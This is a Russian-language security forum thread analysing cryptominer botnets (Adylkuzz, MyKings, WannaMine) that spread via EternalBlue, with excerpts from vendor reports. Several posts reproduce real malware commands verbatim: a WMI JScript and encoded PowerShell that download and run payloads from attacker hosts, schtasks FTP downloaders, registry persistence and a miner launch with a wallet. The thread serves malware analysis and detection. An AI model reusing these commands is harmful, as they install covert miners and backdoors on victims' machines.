Майнеры криптовалют используют EternalBlue/DoublePulsar

отредактировано September 2021 Раздел: Вирусы & Антивирусы
Шифровальщик WannaCry (он же Wana Decrypt0r, WCry, WannaCrypt0r и WannaCrypt), как оказалось, был отнюдь не единственной малварью, которая эксплуатировала уязвимость в SMB и использовала похищенные у АНБ эксплоиты ETERNALBLUE и DOUBLEPULSAR.

Специалисты компании Proofpoint обнаружили криптовалютный майнер Adylkuzz , который преимущественно занимается майнингом валюты Monero. По данным специалистов, малварь использует точно такой же механизм распространения, как и WannaCry: сканирует SMB-порты, применяет эксплоит ETERNALBLUE и заражает уязвимые системы без ведома пользователей, задействовав DOUBLEPULSAR.
On Friday, May 12, attackers spread a massive ransomware attack worldwide using the EternalBlue exploit to rapidly propagate the malware over corporate LANs and wireless networks. EternalBlue, originally exposed on April 14 as part of the Shadow Brokers dump of NSA hacking tools, leverages a vulnerability (MS17-010) in Microsoft Server Message Block (SMB) on TCP port 445 to discover vulnerable computers on a network and laterally spread malicious payloads of the attacker’s choice. This particular attack also appeared to use an NSA backdoor called DoublePulsar to actually install the ransomware known as WannaCry.

Более того, исследователи уверены, что вредоносная кампания Adylkuzz стартовала гораздо раньше WannaCry, как минимум 2 мая 2017 года, а возможно даже раньше – 24 апреля 2017 года. Adylkuzz не привлек к себе так много внимания, как нашумевший шифровальщик, по той простой причине, что заметить заражение в этом случае гораздо сложнее. Единственные «симптомы», на которые может обратить внимание пострадавший, это замедление работы ПК, так как майнер оттягивает на себя ресурсы системы.

Специалисты отмечают, что Adylkuzz в некотором роде защитил пострадавших от него пользователей от атак WannaCry.

После успешной эксплуатации через EternalBlue машины заражаются DoublePulsar. Затем бэкдор DoublePulsar загружает и запускает Adylkuzz с другого хоста. После запуска Adylkuzz сначала остановит все потенциальные уже запущенные экземпляры и заблокирует обмен данными по протоколу SMB, чтобы избежать дальнейшего заражения. Затем он определяет общедоступный IP-адрес жертвы и загружает инструкции по майнингу, криптомайнер и инструменты очистки.
Executed commands:

taskkill /f /im hdmanager.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
taskkill /f /im mmc.exe
sc stop WELM
sc delete WELM
netsh ipsec static add policy name=netbc
netsh ipsec static add filterlist name=block
netsh ipsec static add filteraction name=block action=block
netsh ipsec static add filter filterlist=block any srcmask=32 srcport=0 dstaddr=me dstport=445 protocol=tcp description=445
netsh ipsec static add rule name=block policy=netbc filterlist=block filteraction=block
netsh ipsec static set policy name=netbc assign=y
C:\Windows\Fonts\wuauser.exe --server
C:\Windows\Fonts\msiexev.exe -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 49v1V2suGMS8JyPEU5FTtJRTHQ9YmraW7Mf2btVCTxZuEB8EjjqQz3i8vECu7XCgvUfiW6NtSRewnHF5MNA3LbQTBQV3v9i -p x -t 1
C:\Windows\TEMP\\s2bk.1_.exe /stab C:\Windows\TEMP\\s2bk.2_.log
taskkill /f /im msiexev.exe
netsh advfirewall firewall delete rule name="Chrome"
netsh advfirewall firewall delete rule name="Windriver"
netsh advfirewall firewall add rule name="Chrome" dir=in program="C:\Program Files\Google\Chrome\Application\chrome.txt" action=allow
netsh advfirewall firewall add rule name="Windriver" dir=in program="C:\Program Files\Hardware Driver Management\windriver.exe" action=allow
C:\Windows\445.bat
C:\Windows\system32\PING.EXE ping 127.0.0.1
net stop Windows32_Update
attrib +s +a +r +h wuauser.exe
C:\Windows\system32\SecEdit.exe secedit /configure /db C:\Windows\netbios.sdb
C:\Windows\system32\net1 stop Windows32_Update

Похоже, что в любой момент времени существует несколько серверов управления и контроля (C&C) Adylkuzz, на которых размещаются двоичные файлы криптомайнера и инструкции по майнингу.


Заключение

Как и кампания WannaCry на прошлой неделе, в этой атаке используются просочившиеся хакерские инструменты АНБ и исправленная уязвимость в сети Microsoft Windows. Кампания Adylkuzz фактически предшествует WannaCry на много дней. Для организаций, использующих устаревшие версии Windows или не внедривших исправление SMB, выпущенное Microsoft в прошлом месяце, компьютеры и серверы останутся уязвимыми для этого типа атак. Независимо от того, связаны ли они с программами-вымогателями, майнерами криптовалюты или любым другим типом вредоносного ПО, эти атаки потенциально могут быть весьма разрушительными и дорогостоящими. Две основные кампании уже использовали инструменты атаки и уязвимости; мы ожидаем, что другие последуют за ними, и рекомендуем организациям и частным лицам исправлять свои машины как можно скорее.

e6680bf0d3b32583047e9304d1703c87878c7c82910fbe05efc8519d2ca2df71 2017-05-14 Msiexev.exe
Bitcoin miner process

https://www.proofpoint.com/us/blog\threat-insight/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar

https://xakep.ru/2017/05/17/more-attacks-on-smb/

пример AdylKuzz в образе автозапуска:
Полное имя C:\WINDOWS\PREFETCH\WUAUSER.EXE
Обнаруженные сигнатуры
Сигнатура Trojan:Win32/Adylkuzz.A [Microsoft] (delall) [глубина совпадения 64(64), необх. минимум 8, максимум 64] 2018-10-23
Размер 207360 байт
Создан 26.04.2017 в 17:29:34
Изменен 26.04.2017 в 17:29:3
Доп. информация на момент обновления списка
SHA1 D84884B6B2018C2859638EE7ACB40ECDC642B324
MD5 B36BA9B358A2B85206CA5AB644021945
Ссылки на объект
Ссылка HKLM\System\CurrentControlSet\Services\WELM\ImagePath
ImagePath C:\Windows\Prefetch\wuauser.exe --server
WELM тип запуска: Авто (2)
Полное имя C:\WINDOWS\SECURITY\MSIEXEV.EXE
Обнаруженные сигнатуры
Сигнатура Trojan:Win32/Adylkuzz.A [Microsoft] (delall) [глубина совпадения 64(64), необх. минимум 8, максимум 64] 2018-10-23
Размер 1233408 байт
Создан 27.04.2017 в 13:16:22
Изменен 27.04.2017 в 13:16:22
Доп. информация на момент обновления списка
SHA1 5B6BE3DE3143AAAFBE6A3B2FCDA778DF5A8989C3
MD5 B60F2EFACB26A2462B3D6E826F281AC4

===================
Мы ищем точки опоры не с целью перевернуть мир, но чтобы не позволить миру опрокинуть нас.
Тэги темы:

Комментарии

  • отредактировано January 2022 PM
    Далее, если следовать хронологии, как отмечает в своем отчете SophosLab, (и как поправили нас в своем отчете )
    The name c3.bat hints that there might be earlier version. In fact, there is a Russian blog that connects the Adylkuzz botnet with the DoublePulsar exploit.
    , становится более активен ботнет Mykings, который возможно и стоит за многими атаками на системы так же с использованием EternalBlue NSA exploit, инструментария WMI для обновления и экплуатации систем с целью майнинга криптовалют, буткита для закрепления устойчивой работы бэкдора и майнеров и др.

    Мы видим, что Mykings/Smominru/( BOOT.DarkGalaxy - по классификации ЛК )использует тот же прием, что и AdylKuzz, т.е. заразив систему, майнер закрывает «дырку» в SMB и не позволяет другой малвари воспользоваться брешью.

    пример кода вC2.bat:
    ping 127.0.0.1 -n 10
    net1 user IISUSER$ /del&net1 user IUSR_Servs /del
    cacls c:\windows\twain_32\csrss.exe /e /d system&cacls c:\windows\twain_32\csrss.exe /e /d everyone&del c:\windows\twain_32\*.*
    schtasks /create /tn "Mysa1" /tr "rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa" /ru "system"  /sc onstart /F
    schtasks /create /tn "Mysa2" /tr "cmd /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p" /ru "system"  /sc onstart /F
    netsh ipsec static add policy name=win
    netsh ipsec static add filterlist name=Allowlist
    netsh ipsec static add filterlist name=denylist
    netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
    netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
    netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
    netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
    netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
    netsh ipsec static add filteraction name=Allow action=permit
    netsh ipsec static add filteraction name=deny action=block
    netsh ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny
    netsh ipsec static set policy name=win assign=y 
    ver | find "5.1." > NUL && sc config SharedAccess start= auto && net start SharedAccess && netsh firewall set opmode mode=enable && netsh firewall set portopening protocol = ALL port = 445 name = 445 mode = DISABLE scope = ALL profile = ALL
    @Wmic Process Where "Name='winlogon.exe' And ExecutablePath='C:\Windows\system\winlogon.exe'" Call Terminate &del C:\Windows\system\winlogon.exe
    @Wmic Process Where "Name='svchost.exe' And ExecutablePath='C:\Windows\system\svchost.exe'" Call Terminate &del C:\Windows\system\svchost.exe
    @Wmic Process Where "Name='svchost.exe' And ExecutablePath='C:\Windows\twain_32\svchost.exe'" Call Terminate &del C:\Windows\twain_32\svchost.exe
    @Wmic Process Where "Name='csrss.exe' And ExecutablePath='C:\Windows\twain_32\csrss.exe'" Call Terminate &del C:\Windows\twain_32\csrss.exe
    @Wmic Process Where "Name='csrss.exe' And ExecutablePath='C:\Windows\tasks\csrss.exe'" Call Terminate &del C:\Windows\tasks\csrss.exe
    del C:\WINDOWS\Debug\c2.bat
    exit
    
    Для загрузки майнера криптовалют злоумышленники использовали скрипт (VBS или PowerShell), добавленный в базу, и запускаемый через инструментарий WMI.

    Дмитрий Кузнецов, автор Universal Virus Sniffer в новом выпуске uVS 4.0 добавил функцию обнаружения вредоносных скриптов, заражающих систему майнером через обработчики событий WMI:
    Полное имя WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
    Имя файла FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
    Тек. статус ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске

    Удовлетворяет критериям
    WMI_ACTIVESCRIPTEVENTCONSUMER(CONSUMER_NAME ~ FUCKYOUMM2_CONSUMER)(1) [delall (0)]

    Сохраненная информация на момент создания образа
    Статус в автозапуске

    Namespace \\.\root\subscription
    Consumer_Name fuckyoumm2_consumer
    Consumer_Class ActiveScriptEventConsumer
    Consumer_ScriptingEngine Jscript
    Consumer_ScriptText var toff=3000;var url1 = "][ттп://wmi.mykings.top:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for (i = 0; i < arr.length; i++) { t = arr[i].split(" "); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run("taskkill /f /im " + proc, 0, true);if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };var locator=new ActiveXObject("WbemScripting.SWbemLocator");var service=locator.ConnectServer(".","root/cimv2");var colItems=service.ExecQuery("select * from Win32_Process");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption=="rundll32.exe")p.Terminate()};var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get("Win32_Process");var url="][ттп://wmi.mykings.top:8888/test.html",http=new ActiveXObject("Microsoft.XMLHTTP"),ado=new ActiveXObject("ADODB.Stream"),wsh=new ActiveXObject("WScript.Shell");for(http.open("GET",url,!1),http.send(),str=http.responseText,arr=str.split("\r\n"),i=0;arr.length>i;i++)t=arr[i].split(" ",3),http.open("GET",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);pp.create("regsvr32 /s shell32.dll");pp.create("regsvr32 /s WSHom.Ocx");pp.create("regsvr32 /s scrrun.dll");pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");pp.create("regsvr32 /s jscript.dll");pp.create("regsvr32 /u /s /i:][ттп://js.mykings.top:280/v.sct scrobj.dll");pp.create("rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa");
    Filter_Name fuckyoumm2_filter
    Filter_Class __EventFilter
    Filter_Query select * from __timerevent where timerid="fuckyoumm2_itimer"
    #MOF_Bind#
    instance of __FilterToConsumerBinding
    {
    Consumer = "\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name=\"fuckyoumm2_consumer\"";
    Filter = "\\\\.\\root\\subscription:__EventFilter.Name=\"fuckyoumm2_filter\"";
    };

    #MOF_Event#
    instance of __EventFilter
    {
    Name = "fuckyoumm2_filter";
    Query = "select * from __timerevent where timerid=\"fuckyoumm2_itimer\"";
    QueryLanguage = "wql";
    };



    Trend Micro добавил технический отчет по криптомайнерам, с использованием EternalBlue и WMI скрипта

    CoinMiner.png
    A new malware family detected under the name of CoinMiner is causing users and security firms alike loads of problems, being hard to stop or detect due to the combination of various unique features.

    The malware — a cryptocurrency miner — uses the EternalBlue NSA exploit to infect victims and the WMI (Windows Management Instrumentation) toolkit as a method to run commands on infected systems.

    In addition, CoinMiner also runs in memory (fileless malware), and uses multiple layers of command and control servers to deploy the multitude of scripts and components it needs to infect victims.

    All of these make a deadly mixture of features that spell trouble for outdated machines and systems running antivirus solutions not up to par with the latest infection techniques.

    Новая семейство вредоносных программ, обнаруженных под названием Coinminer, приводит к тому, что пользователи и фирмы безопасности имеют одинаковое множества проблем, которые трудно остановить или обнаруживать из-за комбинации различных уникальных особенностей.

    Malware - CryptogUrnency Miner - использует ETERNALBLUE NSA для инфекции пострадавших и WMI (инструментария управления Windows Management) в качестве метода для запуска команд на зараженных системах.

    Кроме того, Coinminer также работает в памяти (безтелые вредоносные программы) и использует несколько слоев командных и управляющих серверов для развертывания множества скриптов и компонентов, которые необходимо заражать жертвам.

    Все это делают из них смертельную смесь функций, для необновленных машин и систем, работающих на антивирусных решениях, которые не справляются с новейшими методами инфекции.

    bleepingcomputer.com

    blog.trendmicro.com
    Мы ищем точки опоры не с целью перевернуть мир, но чтобы не позволить миру опрокинуть нас.
  • отредактировано August 2021 PM
    SophosLab ранее опубликовал детальный отчет о работе ботнета Mykings, который возможно и стоит за многими атаками на системы с использованием EternalBlue NSA exploit, инструментария WMI для обновления и экплуатации систем с целью майнинга криптовалют, буткита для закрепления устойчивой работы бэкдора и майнеров и др.
    MyKings: медленный, но неустанный рост ботнета

    Ботнет MyKings имеет широкую ряд автоматизированных методов взлома серверы - все для установки майнера криптовалюты.

    Вступление
    Ботнет MyKings / DarkCloud / Smominru (который мы будем называть MyKings) был активен в течение двух лет. Хотя отдельные модули были описаны в нескольких публикациях, в прошлом эта статья не фокусировалась на глубоком анализе отдельных используемых вредоносных компонентов. во время активности. Здесь мы смотрим на взаимодействие между различными элементами инструментов, используемыми злоумышленников MyKings и их роли в процессе заражения, чтобы получить полную картину работа ботнета. Ботнет обычно доставляет криптомайнеры и трояны удаленного доступа (RAT). Недавно злоумышленники, стоящие за MyKings, добавили функциональность буткита, чтобы избежать обнаружения и установить постоянство это трудно удалить или смягчить. Самая ранняя активность MyKings датируется 2016 годом, и с тех пор она активна, но мы обнаружили некоторые пересекаются в образцах и серверной инфраструктуре с более ранней кампанией.

    Основные выводы этого исследования заключаются в следующем:

    * Ботнет распространяется путем атаки на слабые комбинации имени пользователя и пароля в MySQL, MSSQL, telnet, ssh, IPC, WMI, RDP, а также дополнительно использует EternalBlue для бокового движения.

    * Во время начальных процессов заражения ботнет защищает компьютер; удаляет процессы, файлы и настройки, принадлежащие семействам вредоносных программ, управляемые другими угрозами актеры; и закрывает коммуникационные порты, которые могут быть использованы для повторного заражения компьютера.

    Злоумышленники, стоящие за этим ботнетом, предпочитают использовать открытый исходный код или другое доступное ПО и обладают достаточными навыками, чтобы вносить изменения и улучшения в исходный код.

    Основными целями ботнета являются страны Азии, но мы можем найти инфекции повсюду.

    В число наиболее инфицированных стран входили:

    * Китай * Тайвань * Россия * Бразилия * США * Индия * Япония

    Процесс заражения

    Компоненты ботнета очень взаимосвязаны, и существует множество возможных путей или способв заражений.

    ok.exe - установщик буткита Ботнет MyKings начал интенсивно использовать компоненты буткита в начале 2019 года. Однако первые версии установщика буткита датируются июнем 2018 г.

    Наиболее распространенный вариант попадал в зараженные системы с именами файлов ok.exe или max.exe.

    Установщики буткитов обычно защищены с помощью VMProtect, что делает более сложным точный анализ.

    Это характерно для ботнета: есть несколько компонентов, каждый из которых они делают очень похожую процедуру самообновления. Таким образом, даже если большинство компонентов ботнет удаляется с компьютера, остальные имеют возможность восстановить его до полной силы.

    Он выполняет поиск в списке запущенных процессов и завершает те, которые связаны с продуктами безопасности, используя жестко запрограммированный список имен.

    c3.bat - это компонент, который завершает процесс заражения. Это относительно большой командный файл; В размер варьируется, но обычно он составляет от 3 000 до 20 000 байт. Он запускает несколько десятков процессов по мере выполнения своей задачи - загрузки обновлений, установки. компоненты, устанавливая стойкость и очищая все следы, которые были созданы во время начальный процесс заражения. Это наиболее часто используемый компонент кампаний, было несколько десятков его вариантов. обнаружено, что они отличались в незначительных деталях, таких как список уничтожения или имена учетных записей пользователей. Обычно он устанавливается из самораспаковывающихся архивов RAR, содержащих два файла, n.vbs и c3.bat.

    Криптомайнинг - ресурсоемкий процесс, на компьютере есть место только для одного. MyKings пытается убедиться, что ему не нужно делить драгоценный процессор с другими майнерами - даже если они дружеские. Многие имена процессов используются более старыми версиями ботнета MyKings, поэтому этот механизм также может служить частью процесса обновления. Обратите внимание, что более старые версии майнеров, вероятно, использовали более старые (и уже заблокированы) идентификаторы кошельков, которые бесполезны. Список убитых процессов со временем менялся

    Некоторые имена используются чаще, другие могут быть связаны с конкретными угрозами, например:
    doc001.exe (майнер XMRig)
    docv8.exe (майнер XMRig)
    wodCmdTerm.exe (майнер XMRig)
    NsCpuCNMiner64.exe (CNMiner)
    tlscntr.exe (майнер XMRig)
    ctfmonc.exe (майнер XMRig)
    wuauser.exe (майнер XMRig)
    mscsuscr.exe (майнер XMRig)
    Pviunc.exe (майнер XMRig)
    Bllianc.exe (майнер XMRig)
    dether.exe (майнер XMRig)

    Правила межсетевого экрана

    Пакетный файл изменяет правила брандмауэра. Цель состоит в том, чтобы закрыть порты, которые использовались для первоначального инфекции или могут быть использованы для последующих инфекций. Таким образом ботнет защищает себя от враждебных захват, обезопасив зараженный компьютер. Он создает новые правила брандмауэра, которые блокируют доступ к зараженному компьютеру на портах 135, 137, 138, 139 и 445 (относится к таким службам, как RPC, NetBIOS и Active Directory). Это закрывает возможность повторное заражение с помощью эксплойта RDP или EternalBlue.

    Обновление компонентов

    Скрипт скачивает с сайтов обновлений ряд различных скриптов, например:
    powershell.exe IEX (New-Object
    system.Net.WebClient).DownloadString('hxxp://wmi.1217bye[.]host/S.ps1')&powershell.exe IEX
    (New-Object
    system.Net.WebClient).DownloadString('hxxp://173.208.139[.]170/s.txt')&powershell.exe IEX
    (New-Object system.Net.WebClient).DownloadString('hxxp://35.182.171[.]137/s.jpg')||regsvr32 /u
    /s /i:hxxp://wmi.1217bye[.]host/1.txt scrobj.dll&regsvr32 /u /s
    /i:hxxp://173.208.139[.]170/2.txt scrobj.dll&regsvr32 /u /s /i:hxxp://35.182.171[.]137/3.txt
    scrobj.dll"
    Роль загружаемых файлов следующая:
    • s.ps1: завершает все процессы svchost.exe и conhost.exe, которые не выполняются из системный каталог и выполняет c: \ windows \ temp \ conhost.exe
    • s.txt: скрипт сбора информации
    • s.jpg: убивает процессы, связанные с майнером, и определяет правила брандмауэра.
    • 1.txt: загружает компоненты PE (обычно установщик буткита и дроппер c3.bat).
    • 2.txt: список URL-адресов для компонентов.

    Загружается несколько различных компонентов, и используются несколько методов сохранения, чтобы убедиться, что буткит переживает перезагрузку на компьютере

    полный отчет здесь
    Мы ищем точки опоры не с целью перевернуть мир, но чтобы не позволить миру опрокинуть нас.
  • отредактировано August 2021 PM
    +
    Устойчивость

    Пакетный сценарий использует несколько различных методов для достижения устойчивости и выживаемости после загрузки системы

    Буткит

    Компонент буткита - это первый из методов сохранения. Поскольку в IPL перезаписывается вредоносный код, он будет выполняться при каждой перезагрузке, а также загружает и запускает компоненты ботнета.

    Ключи автозапуска в реестре

    В дополнение к этому пакетный файл создает ключ автозапуска реестра, который использует regsvr32.exe для извлечения и выполнения обновления, в данном случае v.sct, который представляет собой простой скриптлет, загружающий компоненты Win32.
    reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "start" /d
    "regsvr32 /u /s /i:hxxp://js.1226bye[.]xyz:280/v.sct scrobj.dll" /f

    reg add "HKLM\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run" /v
    "start" /d "regsvr32 /u /s /i:hxxp://js.1226bye[.]xyz:280/v.sct scrobj.dll" /f


    Задачи по расписанию

    Некоторые компоненты прописаны в отдельную задачу. Названия задач обычно:
    ok, Mysa, Mysa1, Mysa2 и Mysa3.

    Запланированные задачи выполняются при запуске системы с помощью командной строки, которая подключается к ftp-серверу. и скачивает обновление, в случае задачи Mysa исполняемый файл будет сохранен как a.exe
    schtasks /create /tn "Mysa" /tr "cmd /c echo open ftp.1226bye[.]xyz>s&echo
    test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo
    bye>>s&ftp -s:s&c:\windows\update.exe" /ru "system" /sc onstart /F

    schtasks /create /tn "Mysa2" /tr "cmd /c echo open ftp.1226bye[.]xyz>p&echo
    test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp
    -s:p" /ru "system" /sc onstart /F

    schtasks /create /tn "Mysa3" /tr "cmd /c echo open ftp.1226bye[.]xyz>ps&echo
    test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo
    bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe" /ru "system" /sc onstart /F
    Запланированные задачи обычно загружают дополнительные компоненты через ftp-соединение, в данном конкретном случае. бэкдор Forshare и майнер.

    Затем другой набор задач запускает загруженный файл ok.dat, который является файлом DLL Windows, поэтому сценарий выполняет экспорт ServiceMain с параметром aaaa. Этот компонент является бэкдором PCShare.
    schtasks / create / tn "Mysa1" / tr "rundll32.exe c: \ windows \ debug \ item.dat, ServiceMain aaaa "/ ru" system "/ sc onstart / F schtasks / create / tn "ok" / tr "rundll32.exe c: \ windows \ debug \ ok.dat, ServiceMain aaaa "/ ru" система "/ sc onstart / F


    сценарии WMI

    Третий метод использует фильтры WMI для установления исполнения.

    c3.bat сначала удаляет следующие сценарии событий WMI, созданные более ранней версией ботнета:
    • fuckyoumm2_filter
    • fuckyoumm2_consumer
    • fuckayoumm3
    • fuckayoumm4
    • Windows Events Consumer
    • Windows Events Consumer4
    • Windows Events Filter

    Затем регистрирует новый фильтр с именем fuckyoumm4, который выполняется каждые 3 часа (10800 секунд).
    wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="fuckyoumm3",
    EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM
    __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA
    'Win32_PerfFormattedData_PerfOS_System'"&wmic /NAMESPACE:"\\root\subscription"
    PATH CommandLineEventConsumer CREATE Name="fuckyoumm4",
    CommandLineTemplate="cmd /c powershell.exe -nop -enc
    \"JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiA
    EMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0
    AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB
    0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJA
    BfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAR
    gBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA==\"&powershell.ex
    e IEX (New-Object
    system.Net.WebClient).DownloadString('hxxp://wmi.1217bye[.]host/S.ps1')&powersh
    ell.exe IEX (New-Object
    system.Net.WebClient).DownloadString('hxxp://173.208.139[.]170/s.txt')&powershe
    ll.exe IEX (New-Object
    system.Net.WebClient).DownloadString('hxxp://35.182.171[.]137/s.jpg')||regsvr32
    /u /s /i:hxxp://wmi.1217bye[.]host/1.txt scrobj.dll&regsvr32 /u /s
    /i:hxxp://173.208.139[.]170/2.txt scrobj.dll&regsvr32 /u /s
    /i:hxxp://35.182.171[.]137/3.txt scrobj.dll"&wmic
    /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE
    Filter="__EventFilter.Name=\"fuckyoumm3\"",
    Consumer="CommandLineEventConsumer.Name=\"fuckyoumm4\""

    Это код события - зашифрованная команда PowerShell, которая загружает текстовый файл с URL-адреса.
    hxxp: //wmi.1217bye [.] host / 2.txt (URL-адрес может со временем измениться).
    $wc=New-Object
    System.Net.WebClient;$wc.DownloadString('hxxp://wmi.1217bye[.]host/2.txt').trim(
    ) -split '[\r\n]+'|%{$n=$_.split('/')[-1];$wc.DownloadFile($_, $n);start $n;}
    Содержимое этого файла должно содержать список URL-адресов следующего этапа, которые загружаются и выполнен. Пример содержимого файла 2.txt был следующим:
    hxxp://173.247.239[.]186/ok.exe
    hxxp://173.247.239[.]186/upsupx.exe
    hxxp://173.247.239[.]186/u.exe
    Дополнительные три команды в сценарии WMI загружают еще три компонента:
    hxxp://173.208.139[.]170/s.txt
    hxxp://35.182.171[.]137/s.jpg
    hxxp://wmi.1217bye[.]host/S.ps1
    Здесь s.txt - это сценарий PowerShell, который загружает файл списка уничтожения из hxxp: //139.5.177 [.] 19 / l.txt.

    Этот файл содержит список имен процессов; сценарий останавливает каждый процесс в этом списке:
    lsmose.exe,C:\Windows\debug\lsmose.exe,1
    lsmos.exe,C:\Windows\debug\lsmos.exe,1
    lsmo.exe,C:\Windows\debug\lsmo.exe,1
    csrw.exe,C:\Program Files (x86)\Common Files\csrw.exe,119
    csrw.exe,C:\Program Files\Common Files\csrw.exe,1
    lsmosee.exe,c:\windows\help\lsmosee.exe,1
    csrs.exe,c:\csrs.exe,1

    В завершение c3.bat загружает и выполняет s.txt. Это извлекает список уничтожения и останавливает процессы указанный в нем, а также дополнительно загружает и выполняет сценарий с именем up.txt. Это сценарий сбора информации, который собирает системную информацию (включая пароли, использующие Powerkatz [23]) и загружает его на ftp-сервер 192.187.111.66, который был активным сервером сбора. на момент написания этого документа.

    полный отчет здесь
    Мы ищем точки опоры не с целью перевернуть мир, но чтобы не позволить миру опрокинуть нас.
  • отредактировано August 2021 PM
    WannaMine v4.0 Обзор анализа и исправления

    Как и его предшественники, WannaMine v4.0 использует эксплойт EternalBlue для распространения и компрометации уязвимых хостов. Его дизайн похож на WannaMine v3.0 в том, что он хранит двоичные файлы эксплойта EternalBlue в каталоге, расположенном в C: \ Windows; однако каталог в версии 4.0 был переименован в «NetworkDistribution». Вместо использования одного жестко заданного имени службы, такого как WannaMine v3.0, версия 4.0 будет случайным образом генерировать .dll и имя службы на основе списка жестко заданных строк. Это делается для того, чтобы поддерживать постоянство на хосте.

    https://www.crowdstrike.com/blog/weeding-out-wannamine-v4-0-analyzing-and-remediating-this-mineware-nightmare/

    проблема была связана с отсутствием детекта на управляющую dll, которая загружалась как служба через легальный svchost.exe

    HKLM\System\CurrentControlSet\Services\ApplicationTimeSystem\Parameters\ServiceDLL
    C:\Windows\system32\ApplicationTimeSystem.dll
    при новой перезагрузке могло быть изменено имя dll, которое генерировалось случайным образом + изменен хэш.

    при запуске службы, через управляющую dll выполнялось сканирование по локальной сети, с возможностью дальнейшего горизонтального распространения майнера по локальной сети, с использованием эксплойтов и инструментов, полученных от shadow brokers через уязвимость MS-17-010.
    Attack Procedure:

    The DLL file ApplicationNetBIOSClient.dll is corresponding to the service ApplicationNetBIOSClient and loaded through the executable svchost.exe. Every time it starts upon system startup, another executable spoolsv.exe is loaded.
    Then spoolsv.exe scans the local area network on port 445 to find target hosts and starts the vulnerability exploit program svchost.exe and spoolsv.exe. Svchost.exe performs EternalBlue butter overflow attacks against the hosts targeted in Step 2.
    Upon successful intrusion, spoolsv.exe (a NSA-linked exploit kit, DoublePulsar) installs backdoor and malicious payload (x86.dll/x64.dll).
    The payload (x86.dll/x64.dll) is executed to duplicate rdpkax.xsl from local host to target host, decompress the file, register ApplicationNetBIOSClient service and start spoolsv to perform attacks. Each host is infected in the above ways, step by step.

    bto4ksv1r02t.png

    Мы ищем точки опоры не с целью перевернуть мир, но чтобы не позволить миру опрокинуть нас.
  • отредактировано September 2021 PM
    Это исследование содержит подробный технический отчет, выполненный после анализа образца вредоносного кода с основной целью: определить действия, которые он выполняет, как это размножается, а также идентифицировать семейство, к которому он принадлежит, и возможные деструктивные эффекты: что он может вызвать, знать об этом и уметь выполнять действия по профилактике и ответные меры.

    Образец объекта этого анализа, разработанный командой INCIBE-CERT, представляет собой описание вредоносных компонент (артефактов) в Powershell, обнаруженный в системах.

    Начальным образцом для этого исследования является многослойный, обфусцированный файл Powershell вектор входа которой во время первого заражения неизвестен. После анализа было установлено, что это вредоносное ПО из семейства WannaMine, чья основная цель - криптомайнинг (использование пораженных машин для майнинга криптовалюты), который пытается распространиться по зараженной сети.
    WannaMine известен с 2017 года, и существует несколько вариантов с разными функциональными возможностями и модулями. Было установлено, что образец, анализируемый в этом исследовании был создан в конце 2019 года.
